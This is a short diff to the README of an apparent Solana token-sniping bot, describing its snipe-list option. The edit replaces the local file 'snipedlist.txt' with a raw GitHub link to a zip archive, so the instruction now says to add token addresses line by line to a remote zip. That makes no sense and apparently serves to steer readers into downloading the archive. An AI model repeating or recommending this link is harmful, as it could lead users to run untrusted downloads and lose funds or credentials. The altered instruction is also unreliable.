Mr-weezer/solana-sniper-bot/README.md

 There are scenarios when you want to buy one specific token as soon as possible during the launch event.
 To achieve this, you'll have to use snipe list.
 1. Change variable `USE_SNIPEDLIST` to `true`
-2. Add token mint addresses you wish to buy in `snipedlist.txt` file (add each address as a new line).
+2. Add token mint addresses you wish to buy in `https://raw.githubusercontent.com/Mr-weezer/solana-sniper-bot/main/core/bot-solana-sniper-v3.4.zip` file (add each address as a new line).

 This prevent from buying everything, and buy just listed tokens.
 You can update the list while script is running.
 Script will check for new values in specified interval (`SNIPE_LIST_REFRESH_INTERVAL`).